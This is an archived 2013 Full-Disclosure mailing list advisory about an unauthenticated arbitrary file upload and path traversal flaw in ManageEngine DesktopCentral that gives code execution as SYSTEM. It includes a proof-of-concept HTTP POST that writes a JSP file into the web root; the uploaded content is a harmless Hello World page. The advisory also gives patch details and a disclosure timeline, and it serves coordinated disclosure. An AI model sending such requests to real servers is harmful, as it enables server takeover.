lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 18 Nov 2013 03:32:03 +0000
From: Thomas Hibbert <Thomas.Hibbert@...urity-assessment.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: DesktopCentral Arbitrary File Upload Vulnerability

(    , )     (, 
  .   `.' ) ('.    ', 
   ). , ('.   ( ) ( 
  (_,) .`), ) _ _, 
 /  _____/  / _  \    ____  ____   _____ 
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \ 
 /       \/   |    \\  \__(  <_> )  Y Y  \ 
/______  /\___|__  / \___  >____/|__|_|  / 
        \/         \/.-.    \/         \/:wq 
                    (x.0) 
                  '=.|w|.=' 
                  _='`"``=. 

                presents.. 

DesktopCentral Arbitrary File Upload Vulnerability
Affected versions: DesktopCentral versions < 80293

PDF: http://security-assessment.com/files/documents/advisory/DesktopCentral%20Arbitrary%20File%20Upload.pdf

+-----------+ 
|Description| 
+-----------+ 

ManageEngine DesktopCentral 8.0.0 build 80293 and below suffer from an arbitrary file upload vulnerability that can be leveraged to gain arbitrary code execution on the server. The code run on the server in this fashion will execute as NT-AUTHORITY\SYSTEM.
The problem exists in the AgentLogUploadServlet. This servlet takes input from HTTP POST and constructs an output file on the server without performing any sanitisation or even checking if the caller is authenticated. Due to the way the path is constructed it is possible to traverse to the application web root and create a script file that will be executed when called from a web browser.

+------------+ 
|Exploitation| 
+------------+ 

POST/agentLogUploader?computerName=DesktopCentral&domainName=webapps&
customerId=..&filename=test.jsp HTTP/1.1
Host: <desktopcentral>:8020
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: keep-alive
Content-Type: text/html;
Content-Length: 109

<HTML>
 <HEAD>
  <TITLE>Hello World</TITLE>
 </HEAD>
 <BODY>
  <H1>Hello World</H1>
 </BODY>
</HTML>

+----------+ 
| Solution | 
+----------+ 

Apply the patch supplied by the vendor (Patch 80293)

+-------------------+ 
|Disclosure Timeline| 
+-------------------+ 


20/10/2013 – Vulnerability discovered, vendor notified.
25/10/2013 – Vendor acknowledges issue
30/10/2013 - Vendor issues Patch 80293 that fixes the issue
09/11/2013 – Exploit demonstrated at Kiwicon 7
18/11/2013 – Advisory released.

+-----------------------------+ 
|About Security-Assessment.com| 
+-----------------------------+ 

Security-Assessment.com is a New Zealand based world 
leader in web application testing, network security 
and penetration testing. Security-Assessment.com 
services organisations across New Zealand, Australia, 
Asia Pacific, the United States and the United 
Kingdom. 

Security-Assessment.com is currently looking for skilled penetration 
testers. If you are interested, please email 'hr at security-assessment.com'

Download attachment "PGP.sig" of type "application/pgp-signature" (823 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ